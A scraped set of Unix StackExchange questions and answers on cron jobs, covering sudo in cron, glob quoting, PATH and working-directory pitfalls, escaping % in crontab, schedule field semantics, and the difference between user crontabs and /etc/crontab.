/etc/crontab would be used for locally-defined system jobs, run as root, except that I find /etc/cron.{hourly,daily,weekly,monthly} more convenient for those.
In my comment, by “user” I meant “human-backed user” (if you’ll allow me the expression). Jobs run as “system users”, root or otherwise, are system jobs in my mind.
From a Debian packaging perspective, Debian Policy describes the recommended practice regarding cron jobs: in summary, use /etc/cron.{hourly,daily,weekly,monthly} if appropriate, /etc/cron.d otherwise. It’s therefore normal to see package-provided jobs in all five directories.
| user specific jobs vs system jobs running as specific users |
1,400,072,087,000 |
In /etc/cron.d/myjob, I create a cron task of running a bash script and redirect its stdout and stderr to a log file. The script contains a line of sudo running a command.
In the log file:
sudo: no tty present and no askpass program specified
Does that cause some problem that needs my attention?
I was wondering if cron tasks in /etc/cron.d/ files are supposed to not contain sudo?
Thanks.
|
"Supposed" is a judgement call.
Commands called from /etc/cron.d/ are run as a specified user (either root or any other one; it's defined in the cron line). So, normally, there's no need for sudo.
However if you do have a script that calls sudo then you need to make sure the sudoers entry is correct. In particular:
Make sure the entry is assigned to the user running the script (this may be root)
Make sure the entry has the NOPASSWD attribute set so it can run without anyone needing to enter a password.
The error you're seeing is because the sudo command needs a password, but there's no terminal to provide it.
A well-written script would detect whether it was running with the right permissions and not call sudo at all, but there are a lot of bad scripts out there :-)
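As an illustration, a sudoers entry with NOPASSWD might look like the sketch below. The user name and command path are made-up placeholders, and the file should always be edited with visudo:

```
# /etc/sudoers.d/backupjob (hypothetical) -- allow one command, no password
deploy ALL=(root) NOPASSWD: /usr/local/bin/backup.sh
```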
| Are cron tasks in `/etc/cron.d/` files supposed to not contain `sudo`? |
1,400,072,087,000 |
In Ubuntu 16.04, this is the code I have in /etc/cron.daily/cron_daily:
#!/bin/bash
for dir in "/var/www/html/*/"; do
if pushd "$dir"; then
wp plugin update --all --allow-root
wp core update --allow-root
wp language core update --allow-root
wp theme update --all --allow-root
rse
popd
fi
done
I setted this up yesterday and today I got this error into my email:
/etc/cron.daily/cron_daily:
/etc/cron.daily/cron_daily: line 3: pushd:
/var/www/html/*/: No such file or directory
Why is this happening? I assume the quote marks prevent the shell globbing but if so, what should replace them?
|
The * glob is not expanded inside double quotes, so pushd is handed the literal string /var/www/html/*/.
You could try it like this:
#!/bin/bash
for dir in /var/www/html/*/; do
if pushd "$dir"; then
wp plugin update --all --allow-root
wp core update --allow-root
wp language core update --allow-root
wp theme update --all --allow-root
rse
popd
fi
done
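One further hardening step worth considering: if /var/www/html/ ever contains no subdirectories, bash passes the unquoted pattern through unexpanded and pushd again receives the literal string. Setting nullglob makes an empty glob expand to nothing, so the loop simply does not run. A minimal sketch:

```shell
#!/bin/bash
shopt -s nullglob              # an empty glob expands to nothing, not itself
for dir in /var/www/html/*/; do
    echo "would process $dir"
done
```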
| Ubuntu cron.daily returns a path error when a shell glob is used - what's wrong with my path? |
1,400,072,087,000 |
I'm trying to delete files older than six days, then log the files which get deleted.
So far.
In a sh file, I got following;
find /home/pi/ftp/upload -type f -mtime +6 -exec rm {} +
Then within sudo crontab
59 23 * * * /home/pi/scripts/cullftp.sh > /var/log/ftp/`date +\%Y-\%m-\%d-\%H\%M\%S`-cull.log 2>&1
But when it runs at midnight, it only creates an empty file, and none of the files get deleted.
Although this bit of the code work:
find /home/pi/ftp/upload -type f -mtime +6
What is the best way to solve this?
|
1) Make sure the script file is executable, and has a proper hashbang line (#!/bin/sh or #!/bin/bash or such), though you should get an error if it isn't executable.
2) find ... -exec rm will not print anything; you'd need to explicitly tell find to print the filenames too, e.g. find ... -print -exec rm {} + or find ... -print -delete if your find supports -delete.
3) At least on GNU find, -mtime +6 has some interesting rounding. It first rounds the time down to full days (24 h periods), and then sees if the resulting time is strictly greater than 6. The result is that it only matches files that are at least 7*24 hours old. Using something like -mmin +8640 would lessen the impact. (6 days * 24 h/day * 60 min/h = 8640 min)
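Putting the three points together, a sketch of the cleanup (the function name is made up; the path is the one from the question):

```shell
#!/bin/bash
# Print and delete regular files older than ~6 days (8640 minutes)
cull_old() {
    find "$1" -type f -mmin +8640 -print -exec rm {} +
}
# in the real script: cull_old /home/pi/ftp/upload
```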
| shell script to remove files |
1,400,072,087,000 |
I'm using Let's Encrypt to generate SSL certificates automatically every 60 days using a simple shell script.
After the script has reloaded these it tries to reload my services using the commands I would type myself into a shell, i.e- service postfix reload and service dovecot reload.
However, while the first of these works just fine, the service dovecot reload does not work, complaining of an unrecognised service.
The script is run as root as a cron job, so I would expect it to recognise all the same services as when I'm logged in as root myself. Yet for some reason dovecot is not recognised while others work without issue, meaning I have to manually reload dovecot before the old certificates expire, which rather limits the benefit of my script!
What is different about dovecot that would cause it to be unrecognised by my script, but be recognised without issue when I log in as root myself?
Output of lsb_release -a:
No LSB modules are available.
Distributor ID: Ubuntu
Description: Ubuntu 14.04.5 LTS
Release: 14.04
Codename: trusty
Output of ps aux | grep dovecot:
root 860 0.0 0.1 22144 1052 ? Ss May09 1:33 /usr/sbin/dovecot -F -c /etc/dovecot/dovecot.conf
dovecot 1466 0.0 0.0 9288 572 ? S May09 0:11 dovecot/anvil
vmail 22753 0.0 0.4 23904 4116 ? S 16:58 0:00 dovecot/imap
vmail 22754 0.0 0.5 25408 5764 ? S 16:58 0:00 dovecot/imap
dovenull 24108 0.0 0.3 19188 3812 ? S Sep26 0:10 dovecot/imap-login
root 24109 0.0 0.1 9416 1472 ? S Sep26 0:00 dovecot/log
root 24111 0.0 0.2 23772 2660 ? S Sep26 0:01 dovecot/config
vmail 30218 0.0 0.3 23244 3676 ? S 22:40 0:00 dovecot/imap
vmail 30219 0.0 0.3 23252 3540 ? S 22:40 0:00 dovecot/imap
root 30293 0.0 0.4 27924 4416 ? S 22:44 0:00 dovecot/lmtp
dovecot 30294 0.0 0.4 39632 4756 ? S 22:44 0:00 dovecot/auth
root 30295 0.1 0.4 39728 4900 ? S 22:44 0:00 dovecot/auth -w
|
It seems that your problem is because cron scripts run with a different PATH value by default. For example, on Ubuntu as root you have /usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin in your PATH by default. But your cron script running as root has a more limited PATH value: /usr/bin:/bin.
I recommend setting the PATH environment variable at the top of your cron scripts:
PATH='/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin'
In this particular case the problem is that the service script uses /sbin/initctl (Upstart), which is not in the PATH used by cron. If that command fails, it then tries to use the traditional /etc/init.d/${SERVICE} script. But not all the services include that old script and that's why your script works with some services but not with others.
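A defensive version of the renewal script's opening lines might therefore look like this sketch (the reload commands are left commented out, since they only make sense on the target machine):

```shell
#!/bin/sh
# Widen PATH before anything else, so `service` can find /sbin/initctl;
# this list mirrors root's interactive default on Ubuntu 14.04.
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
export PATH
# service postfix reload
# service dovecot reload
```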
| cron script: dovecot: unrecognized service |
1,400,072,087,000 |
Just an one line shell script below not working as a cron job but executing directly from terminal works fine:
#!/bin/bash
echo "Executed" >> ./crond.log 2>&1
What might be the problem?
Checked /var/log/cron and found cron is kicking the task in time:
May 16 10:30:01 vagrant-centos64 CROND[3015]: (root) CMD (sh /vagrant/my.sh)
May 16 10:35:01 vagrant-centos64 CROND[3122]: (root) CMD (sh /vagrant/my.sh)
May 16 10:40:01 vagrant-centos64 CROND[3189]: (root) CMD (sh /vagrant/my.sh)
May 16 10:45:01 vagrant-centos64 CROND[3270]: (root) CMD (sh /vagrant/my.sh)
May 16 10:50:01 vagrant-centos64 CROND[3343]: (root) CMD (sh /vagrant/my.sh)
May 16 10:55:01 vagrant-centos64 CROND[3430]: (root) CMD (sh /vagrant/my.sh)
Crontab job listing is like below:
*/5 * * * * sh /vagrant/mypagelogin.sh
*/5 * * * * sh /vagrant/my.sh
[root@vagrant-centos64 vagrant]#
Access permission for crond.log is:
-rwxrwxrwx 1 vagrant vagrant 0 May 16 10:51 crond.log
UPDATE: crond.log file is located in the same location as my.sh. [/vagrant]
|
First rule of crond club: you don't assume the working directory. My guess is that you'll find a crond.log in /root. If you want it in /vagrant, explicitly redirect the output to /vagrant/crond.log.
(FWIW, the second rule of crond club is: don't assume there's anything in your PATH; use explicit paths to binaries. But since echo is also a bash builtin, you're fine on that one.)
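Applied to the script from the question, the first rule means naming the log file by absolute path; a sketch, with the path made explicit at the call site (the function wrapper is just for illustration):

```shell
#!/bin/bash
# Append a marker line to an explicitly named log file
log_run() {
    echo "Executed" >> "$1" 2>&1
}
# in the cron script: log_run /vagrant/crond.log
```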
| Cron Job: Redirecting shell script output to a file |
1,400,072,087,000 |
I'm running some cron jobs on my machine and every time I fire up a terminal session I'm getting a 'You have mail' message (the job produces output on success which gets mailed to me).
Any way to turn this notification off?
|
The exact mechanism depends on what shell is running in the "terminal session". For the BASH shell, the man page for "bash" says:
MAILCHECK
Specifies how often (in seconds) bash checks for mail. The
default is 60 seconds. When it is time to check for mail, the
shell does so before displaying the primary prompt. If this
variable is unset, or set to a value that is not a number
greater than or equal to zero, the shell disables mail checking.
so setting MAILCHECK=-1 in your .bashrc file would do it. Other shells have man pages with similar advice. (My bash 5.0.17 refuses to let me set the variable to a non-integer unless I first unset it, so the man page is incomplete about using "not a number".)
| Turn off mail notification in terminal |
1,400,072,087,000 |
I want to be able to type a line of command to do the following two commands that I know:
cd ~/rpitwit_commands/
rpitwit
This is because I want to automatically run it upon boot via crontab, and it has to run from within that directory. How do you suggest I do so? Do note that the actual application file is not in that directory (I'm not sure how this works in Debian Linux).
|
When you run commands with cron, the $PATH is set to a minimal list, so it's always best to run commands with full path or first set PATH.
You can execute multiple commands in one go (works with cron too) like this:
cd /home/username/rpitwit_commands && /path/to/command/rpitwit
If you need to stay in the original directory after the commands execute, place them between ( ) to run them in a subshell.
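So the crontab entry for the question's case could look like this (reusing the placeholder path for the binary):

```
@reboot cd /home/username/rpitwit_commands && /path/to/command/rpitwit
```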
| Command to run an application within a specific directory |
1,400,072,087,000 |
I am working on CentOS.
I have created a PHP file which run from browser
http://mydomain.com/backupfile/dobackup.php
I have added the script to crontab and made the file executable, but it is not running:
30 0 * * * /var/www/vhost/mydomain.com/httpdocs/backupfile/dobackup.php
what should i do?
|
Add a shebang line at the top of your script so that cron can execute it directly:
#!/usr/bin/php
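Alternatively, leave the file untouched and name the interpreter in the crontab entry itself (assuming php lives at /usr/bin/php):

```
30 0 * * * /usr/bin/php /var/www/vhost/mydomain.com/httpdocs/backupfile/dobackup.php
```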
| CentOS, PHP file is running from browser, not from cron daemon |
1,400,072,087,000 |
While doing log rotation, we have two options -
Using the daily directive in the logrotate file -
/var/log/wtmp {
daily
minsize 1M
create 0664 root utmp
rotate 1
}
Putting the logrotation file path in /etc/cron.daily/logrotate
Which method is the preferred method and what are the pros and cons of each?
|
/etc/cron.daily/logrotate and rotation configuration files serve different purposes.
/etc/cron.daily/logrotate ensures that logrotate, the tool, is run once a day (if the system is up). It also determines the configuration file that is read, /etc/logrotate.conf. Since the latter typically includes files in /etc/logrotate.d, you generally don’t need to modify it to add new configuration files — instead, add the configuration files to /etc/logrotate.d.
The rotation configuration files determine what happens to each managed log file. This is largely independent of what /etc/cron.daily/logrotate says; the main constraint added by the latter is that logs can’t be rotated more often than logrotate runs, so with the default daily setup, logs can’t be rotated more often than daily.
In typical setups, logrotate has a default setting to rotate logs weekly. If you want to change that, changing /etc/cron.daily/logrotate won’t help; even if you made logrotate run every minute, it still would only rotate logs weekly. To change the frequency at which logs are rotated, you need to change the rotation configuration itself, either globally, or for each log file you want to rotate daily.
So the answer to your question is, to rotate log files daily, specify the daily directive in the relevant section of the rotation configuration.
| What should be the preferred approach while rotating logs - using the daily directive or putting the file path in cron.daily? [closed] |
1,400,072,087,000 |
To begin, here is an example of a filename for a daily backup file:
website-db-backup06-June-2020.tar.gz
The script below works fine when run manually via the terminal. However, I am getting this cron daemon message on my email when the script is run via cron:
tar: website-db-backup*: Cannot stat: No such file or directory
tar: Exiting with failure status due to previous errors
Here is a script I made to compress all daily backups every week:
#!/bin/bash
#
# Weekly compression for database backups
BACKUP_PATH=~/backup/web/database
BACKUP_FILE_DATE=`date '+%d-%B-%Y'`
tar -czf $BACKUP_PATH/website-db-weekly-compress$BACKUP_FILE_DATE.tar.gz \
-C $BACKUP_PATH/ website-db-backup* && rm $BACKUP_PATH/website-db-backup*
Since the daily backups have the date in their filenames, I have to use * in the script. Can this be the reason?
|
The problem is the current working directory of the script. website-db-backup* has no path component, so the glob is expanded relative to whatever directory cron starts the script in. You must add something like this to your script:
SOURCE_DIR_PATH='/path/to/backup_source'
cd "$SOURCE_DIR_PATH" || exit 1
In addition, you should check whether there are any matching files at all before you execute tar:
shopt -s nullglob
set -- website-db-backup*
test $# -eq 0 && { echo 'ERROR: No matching files; aborting'; exit 1; }
It may not be a problem in this case but as danielleontiev points out in the comment it is dangerous to use ~ in a script if this script may be executed by different users. I suggest you replace it with the intended path.
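For reference, the whole script with both fixes folded in might look like the sketch below (the function name is made up, it runs in a subshell so the cd doesn't leak, and the backup path is passed in instead of using ~):

```shell
#!/bin/bash
# Compress all daily backups in the given directory, then remove them
weekly_compress() (
    cd "$1" || exit 1
    shopt -s nullglob
    set -- website-db-backup*
    if [ "$#" -eq 0 ]; then
        echo 'ERROR: No matching files; aborting' >&2
        exit 1
    fi
    tar -czf "website-db-weekly-compress$(date '+%d-%B-%Y').tar.gz" "$@" \
        && rm -- "$@"
)
# in cron: weekly_compress /home/user/backup/web/database
```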
| Script not working as expected when run as a cronjob |
1,400,072,087,000 |
From https://unix.stackexchange.com/a/489913/674
Logging in is a user-space construct; the kernel doesn’t care about that.
There are multiple examples of this; for example, cron jobs can run as any user, without that user being logged in. ... connecting using SSH counts as logging in.
Since there are examples which do and which don't involve logging in, may I ask what logging in is? Which activities count as logging in, and which do not?
Let me guess: is any activity that asks for a user name and password, and checks that information against /etc/passwd and /etc/shadow, counted as logging in, and anything else not?
Is running su logging in?
Is running sudo logging in? Or not, because it doesn't ask for the target user's password?
What are some other educational examples?
Thanks.
|
At the most basic level, it can be considered "authenticating to a service to obtain resources from that service".
But, in Unix, the term isn't so strictly defined. Different services can interpret it in different ways.
Where terminology gets confused is when you think of "logging into Unix" and getting a "login session", rather than "accessing a service".
So, for example, ssh remotemachine is considered logging in, but ssh remotemachine cat /etc/passwd may not be (sshd will perform different actions, log different data, update different files); they're both authenticating to a service and getting resources... but the second version is not considered a "login session".
Also note that authentication need not be using the passwd and shadow files (e.g. an FTP server could use a different authentication database, or SSH public keys may be used, or a kerberos ticket, or...).
| What is logging in? |
1,400,072,087,000 |
Today, when I logged in and checked the ps output, I noticed
a few lines that were run automatically under the root.
I grepped the relevant lines here:
root 1126 0.0 0.0 2616 424 ? Ss Apr16 0:06 cron
root 6445 0.0 0.0 2400 868 ? Ss 07:30 0:00 anacron -s
root 6566 0.0 0.0 2244 276 ? S 07:35 0:00 /bin/sh -c nice run-parts --report /etc/cron.daily
root 6567 0.0 0.0 2152 524 ? SN 07:35 0:00 run-parts --report /etc/cron.daily
root 6574 0.0 0.0 2244 556 ? SN 07:35 0:00 /bin/sh /etc/cron.daily/apt
root 6615 0.0 0.0 2160 272 ? SN 07:35 0:00 sleep 1721
I haven't been using cron on this machine for a long time (years), so I don't remember starting it on the 16th of April. What is the meaning of those commands in sequence? Could it be a security issue?
|
You may not personally be using cron, but the system uses it for essential maintenance tasks, such as rotating log files that have grown too big or too old, checking disk quotas, doing consistency checks, making sure permissions on essential files are correct, or mailing the root user differences between important configuration files that have changed since last run (this differs a lot between systems).
Never try to disable cron. It will prevent essential tasks from running on your system.
If you look in /etc/cron.daily you will find all the system maintenance tasks that are run on a daily basis. On some systems there is also a corresponding weekly and/or monthly lists of tasks.
anacron is a program that is often used on machines that aren't up and running all the time. It is likely that your system uses it to schedule the daily tasks (possibly via cron). It makes sure that daily tasks are run at least once daily (whereas cron requires the machine to be up and running at specific times to run tasks).
run-parts is a Linux thing that runs multiple scripts in a directory in sequence (e.g. all scripts in /etc/cron.daily).
/etc/cron.daily/apt is the currently running maintenance task, obviously having something to do with your package manager apt (possibly doing some update of either packages or of the list of available security updates or something similar).
The sleep may be a delay before the next task is run, if it is related at all.
In short: nothing to worry about, but do have a look at those things in /etc/cron.daily just to inform yourself about how your system works.
| What does "/bin/sh -c nice run-parts --report /etc/cron.daily" mean? |
1,400,072,087,000 |
I have a shell script that writes the date to a log file when executed. When I run the script manually, the correct output gets written to the file. However, this needs to be automated, and when I run as a cron job, nothing is getting written to the file and I am confused why.
crontab:
0 * * * * tomcat /usr/bin/sh /apps/rdsreplication/snap_replication.sh
Sample Code:
#/bin/bash/
echo ---------------------------------------- >> create_snap.txt
echo Start time: >> create_snap.txt
date >> create_snap.txt
Any help would be appreciated!
|
The shell script needs to use the full path for the log file:
#!/bin/bash
# assuming you want the txt file in the same directory as the bash script
logfile="$(dirname "$0")/create_snap.txt"
{
echo ----------------------------------------
echo Start time:
date
} >> "$logfile"
| Cron job isn't writing to log file |
1,400,072,087,000 |
I am trying to add a cron job to perform an rsync from a remote server to a (Ubuntu12) local machine & create a log file.
Below is the crontab-l
00 18 * * * rsync -a -v --delete -e ssh user@centosvm:/home/user/rsync-test ~/backup > ~/rsync$(date +%Y%m%d_%H%M%S).log 2>&1
I kept getting this mail informing me about a syntax error in the job:
Received: by work-virtual-machine (Postfix, from userid 1002)
id 697ADA24A0; Thu, 30 Apr 2015 16:21:01 -0700 (PDT)
From: root@work-virtual-machine (Cron Daemon)
To: user@work-virtual-machine
Subject: Cron <user@work-virtual-machine> "rsync -a -v --delete -e ssh user@centosvm:/home/user/rsync-test ~/backup > /home/user/rsync$(date +
Content-Type: text/plain; charset=ANSI_X3.4-1968
X-Cron-Env: <SHELL=/bin/sh>
X-Cron-Env: <HOME=/home/user>
X-Cron-Env: <PATH=/usr/bin:/bin>
X-Cron-Env: <LOGNAME=user>
Message-Id: <20150430232101.697ADA24A0@work-virtual-machine>
Date: Thu, 30 Apr 2015 16:21:01 -0700 (PDT)
/bin/sh: 1: Syntax error: end of file unexpected (expecting ")")
I have also installed the unix2dos package.
|
Okay, figured it out. Posting back in case someone runs into this someday. The % sign has a special meaning in crontab: it's changed to a newline, and any string after the first % will be sent to the command as standard input. To force cron to interpret it literally, you have to escape it:
00 18 * * * rsync -a -v --delete -e ssh user@centosvm:/home/user/rsync-test ~/backup > ~/rsync$(date +\%Y\%m\%d_\%H\%M\%S).log 2>&1
| Usage of '%' in the crontab [duplicate] |
1,400,072,087,000 |
I read somewhere that you can add a cron job to run every minute like this:
#min hour day month weekday command
*/1 * * * * <your command>
What does the /1 part mean? Can I omit it?
|
That is the step value: in the minutes field, */2 means every other minute, */3 every third minute, and so on. The default step is 1, so you can omit the /1 if you want a step value of 1.
See the crontab(5) man page for more detail: man 5 crontab.
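A few entries for comparison (the command is a placeholder):

```
# every minute (implicit step of 1)
* * * * * /path/to/job
# identical to the line above
*/1 * * * * /path/to/job
# every 15 minutes
*/15 * * * * /path/to/job
# on the hour, every other hour
0 */2 * * * /path/to/job
```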
| Run a cron job every minute, meaning of syntax [duplicate] |
1,400,072,087,000 |
I scheduled a job like this:
* * 6-8 * 1-5 echo "test" >>/tmp/test.log 2>&1
I expect this job to run only on 6th,7th,8th, these 3 days. but today is 18th, it still runs. What is wrong with this job? What shall I do if I want it to run a some specific days?
|
The day-of-month and day-of-week positions are OR'd, so in your example, the cron will run on the 6th, 7th, or 8th or Monday through Friday. Since the 18th is a Monday, it runs. It's not exactly intuitive.
To get the behavior I think you desire (run on the 6th, 7th, and 8th if they are a weekday), then you can do something like this:
* * * * 1-5 date '+\%d' | grep -q '^0[678]$' && echo "test" >>/tmp/test.log 2>&1
(Note the escaped %, which otherwise has a special meaning in crontab, and the anchored pattern, so that days like the 16th or 27th don't also match.)
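A slightly more readable variant moves the date check into a small script, which also sidesteps crontab's special treatment of % in commands; the crontab entry then becomes something like * * * * 1-5 /path/to/run-if-6-8 (script name and path are placeholders):

```shell
#!/bin/sh
# Run the real job only on the 6th, 7th or 8th of the month
# (date +%d is zero-padded, hence the leading 0 in the patterns)
case $(date +%d) in
    06|07|08) echo "test" >> /tmp/test.log ;;
esac
```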
| Third cron field doesn't seem to work (job runs when I don't want it to) |
1,400,072,087,000 |
Every week there's a new work log/to-do list at work. There's a todo script which can be used to extract my own to-do items from that. Currently this is called in ~/.bash_aliases_local, which is sourced from ~/.bash_aliases. Rather than parsing the log every time I start another shell, I'd like to use the standard MOTD (message of the day) functionality. This would involve updating a static file with the to-do list on a weekly basis:
@weekly update-motd
The resulting static text file should be printed every time I start an interactive Bash shell. What's the standard way to do this?
|
If you want to have the message displayed every time you open up a new terminal (under an X session), then motd is not the right place. It is executed by the login program - this happens when you log in on a real tty (or via ssh for example).
For terminal sessions, I believe the only universal way is to run cat somefile at the end of your shell's startup file: either personal (i.e. ~/.bashrc ~/.zshrc etc.) or global (under /etc - see your shell's manpage for details). Generally, I'm afraid there isn't a "standard" way of doing this in case of terminal emulator sessions.
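Concretely, assuming the weekly update-motd job writes the list to ~/.todo-motd (a made-up file name), the startup-file addition could be:

```
# at the end of ~/.bashrc: show the cached to-do list, if present
[ -f ~/.todo-motd ] && cat ~/.todo-motd
```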
| How to update MOTD regularly? |
1,400,072,087,000 |
This might seem like just another basic cron question, but I cannot figure this one out:
@hourly "/usr/bin/php /usr/local/bin/notify.sh"
I migrated a bunch of stuff from one server to another and was able to get most things operating smoothly after some work, and now I'm putting out the fires.
I'm getting this email every hour, when the following cron job is supposed to run:
/bin/sh: 1: /usr/bin/php /usr/local/bin/notify.sh: not found
Typically, not found is caused by the command's directory not being in PATH (a common issue with cron jobs), but I am providing the full path for both PHP and the script. The script runs as root, and interactively, I can run the script.
The script has 755 permissions, just to be safe (anyone can read or execute), so the permissions are not the issue.
I can manually run the script and the script that it calls so I have no idea where this "Not found" is coming from.
Nothing suspicious in the cron log, other than this ran.
This worked properly on the old server.
Is there some other factor likely in play here, or how might I try to trace the cause of this issue?
|
The entry
@hourly "/usr/bin/php /usr/local/bin/notify.sh"
passes /usr/bin/php /usr/local/bin/notify.sh to /bin/sh -c as a single argument. That's why the error message is
/bin/sh: 1: /usr/bin/php /usr/local/bin/notify.sh: not found
rather than either of
/bin/sh: 1: /usr/bin/php: not found
Could not open input file: /usr/local/bin/notify.sh
To pass the program /usr/bin/php and its filename argument /usr/local/bin/notify.sh separately, remove the quoting:
@hourly /usr/bin/php /usr/local/bin/notify.sh
| cron: not found when full paths are provided |
1,400,072,087,000 |
As we know, MAILTO is used for receiving any mail related to a cron job. In my case I have three commands to execute; do I need to add MAILTO three times even if the receiver mail id is the same for each of the three commands? My jobs are running on a CentOS machine.
[email protected]
./first-Command
[email protected]
./second-Command
[email protected]
./third-Command
Or will mentioning the mail id only once work in my situation, like this:
[email protected]
./first-Command
./second-Command
./third-Command
I'm new to the Cron tool. Any idea/hint in the right direction will do!
|
The MAILTO variable, if set, is retrieved from the crontab file, so if it exists and is not "" then it will be used for all subsequent jobs in that file, just like if you had created a shell script like your second example.
Therefore, setting it at the top of the crontab file is enough, just like you could change the crontab shell from sh to bash with SHELL=/bin/bash in the beginning of the file per the man page.
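So a complete crontab for your case could look like the sketch below; note that each job line also needs the five schedule fields, which your examples omitted (the times and paths here are placeholders):

```
[email protected]
0 1 * * * /path/to/first-Command
0 2 * * * /path/to/second-Command
0 3 * * * /path/to/third-Command
```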
| Do we have to rewrite the MAILTO after each cron command? |
1,400,072,087,000 |
I've been following carefully and reading a lot about setting up crontab with crontab -e any help is appreciated on this ...
I have a process that runs on startup (reboot) that works perfectly, and I want it to continue to run every minute but that does not happen. I do have a new-line (linefeed) at the end of the 2nd line. THANKS!!
I have program /dir/xxx that works great on reboot but the same process set to run every minute never triggers. My crontab -e is as follows:
@reboot /dir/xxx
/1 * * * * /dir/xxx
I do have a newline after the second line.
|
I wonder how your crontab accepted this. What you wrote as /1 should in fact be */1. Try it out.
And if it's all in one line, like:
@reboot /dir/xxx /1 * * * * /dir/xxx
Then there should be a new line between both (and */1) instead of /1:
@reboot /dir/xxx
*/1 * * * * /dir/xxx
In the one-line version, /1 * * * * /dir/xxx would be treated and passed as arguments to /dir/xxx, with each * undergoing filename expansion by the shell.
| Why does my every-minute crontab not work but same process on @reboot works fine? |
1,400,072,087,000 |
I have script files.
One of the files needs to run only on the first day of every month.
How can I do this with my cron job?
52 07 * * * bash '/home/linux/tanu/cat.sh'
|
# * * * * *
# | | | | |
# | | | | day of week 0-7 (0 or 7 is Sun, or use names)
# | | | month 1-12 (or names)
# | | day of month 1-31
# | hour 0-23
# minute 0-59
# runs on every 1st of month at 7:52am
52 7 1 * * bash '/home/linux/tanu/cat.sh'
# runs on all other days at 7:52am
52 7 2-31 * * bash '/home/linux/tanu/cat.sh'
I hope that's correct.
| How to schedule cron jobs in linux? |
1,400,072,087,000 |
I have some logic for executing java projects; it all works in the terminal console when I type it, but not in the cron scheduler:
run 1st microservice and get variable from POST request:
java -jar /root/parser-0.0.1-SNAPSHOT.jar
value=$(curl -d '{"query":"java-middle", "turnOff":true}' -H "Content-Type: application/json" -X POST http://localhost:8080/explorer)
v2=$(echo ${value} | jq '.id')
test:
echo $v2
18
18 is the id from the database, and I use it in the next request (first I run the new microservice):
java -jar parsdescription-0.0.1-SNAPSHOT.jar
value=$(curl -d '{"explorerId":'$v2', "turnOff":true}' -H "Content-Type: application/json" -X POST http://localhost:8080/descriptions) >> /var/log/description3.log 2>&1
So the curl request executes normally, the database gets filled with some data, and value holds the correct result.
But, when I create a crontab schedule:
50 09 * * * java -jar /root/parser-0.0.1-SNAPSHOT.jar
51 09 * * * value=$(curl -d '{"query":"java-middle", "turnOff":true}' -H "Content-Type: application/json" -X POST http://localhost:8080/explorer)
52 09 * * * v2=$(echo ${value} | jq '.id')
53 09 * * * java -jar parsdescription-0.0.1-SNAPSHOT.jar
54 09 * * * value=$(curl -d '{"explorerId":'$v2', "turnOff":true}' -H "Content-Type: application/json" -X POST http://localhost:8080/descriptions) >> /var/log/description3.log 2>&1
Then only the first curl executes normally (a new row is created in the database).
Next, the second microservice does start (53 09 * * * java -jar parsdescription-0.0.1-SNAPSHOT.jar), but the second curl command never executes, and nothing is saved to the description3.log file - it stays empty.
Why does this work in the console but not in crontab?
|
Each cron job is a unique shell instance that does not share state with any other cron job, so
51 09 * * * value=42
sets value only for that job, which then exits, and value is then lost. A shell session, by contrast, maintains state over successive lines. You will need a single cron job that runs all that code, or some other design; a single cron job might look like
51 09 * * * /path/to/your/script
and then the file /path/to/your/script should be executable and contain
#!/bin/bash
java -jar /root/parser-0.0.1-SNAPSHOT.jar
value=$(curl -d '{"query":"java-middle", ...
and so forth.
If you need to share data between different cron jobs that information would need to be shared via some IPC (interprocess communication) method (the filesystem, a database, etc).
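For example, here is a minimal sketch of the file-based approach, simulating two independent cron jobs with two separate sh invocations (the /tmp/explorer_id path is just an illustration):

```shell
# Job 1: a fresh shell computes a value and persists it to a file.
sh -c 'v2=18; echo "$v2" > /tmp/explorer_id'

# Job 2: another fresh shell has no $v2 of its own, so it reads the file back.
sh -c 'v2=$(cat /tmp/explorer_id); echo "recovered id: $v2"'
```

A database row or any other shared location works the same way; the point is that the data has to live somewhere outside the shell process itself.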
| cron not executing command with variable |
1,400,072,087,000 |
We want to execute the following every night at 00:00.
Is an entry like this valid in a crontab, even though the command spans several lines?
0 0 * * * find . -type f \( -name '*.wsp' -printf WSP -o -printf OTHER \) -printf ' %T@ %b :%p\0' | sort -zk 1,1 -k2,2rn | gawk -v RS='\0' -v ORS='\0' '
{du += 512 * $3}
du > 10 * (2^30) && $1 == "WSP" {
sub("[^:]*:", ""); print
}' | xargs -r0 rm -f
|
No, your example will not work. You have to write the whole command on a single line. Consider writing a script and just calling the script from cron.
For example:
$ cat mycron.bash
#!/bin/bash
find . -type f \( -name '*.wsp' -printf WSP -o -printf OTHER \) \
-printf ' %T@ %b :%p\0' | \
sort -zk 1,1 -k2,2rn | \
gawk -v RS='\0' -v ORS='\0' '
{du += 512 * $3}
du > 10 * (2^30) && $1 == "WSP" {
sub("[^:]*:", ""); print
}' | xargs -r0 rm -f
Then your crontab entry would be something like this (use the script's full path, since cron's default PATH is minimal):
0 0 * * * /path/to/mycron.bash
| Does crontab accept commands with several lines as shell expected? |
1,400,072,087,000 |
The output of crontab -l and the contents of /etc/crontab are different.
root@ce:~# crontab -l
0-59 * * * * curl http://ce.scu.ac.ir/courses/admin/cron.php?password=mypass
* * * * * ntpdate –s ir.pool.ntp.org
* * * * * php /var/www/html/shub/ow_cron/run.php
root@ce:~# cat /etc/crontab
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user command
*/01 * * * * www-data /var/www/html/shub/ow_cron/run.php
*/1 * * * * www-data /usr/bin/php7.0 /var/www/html/courses/admin/cli/cron.php > /var/log/moodle/cron.log
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
I ask that because some documents say to use crontab -e to define cron jobs. Should I use crontab -e or vim /etc/crontab?
|
crontab -l shows the running user's crontab, the one stored in /var/spool/cron/crontabs. Anything defined there runs under the user id of that user. This isn't particular to root, but root can also have one.
/etc/crontab, on the other hand, contains the system-wide main crontab (along with /etc/cron.d). The entries in that file have an additional field for the username, the jobs defined there run under that user id.
You can use either one, or create a file or files to define your cronjobs under /etc/cron.d.
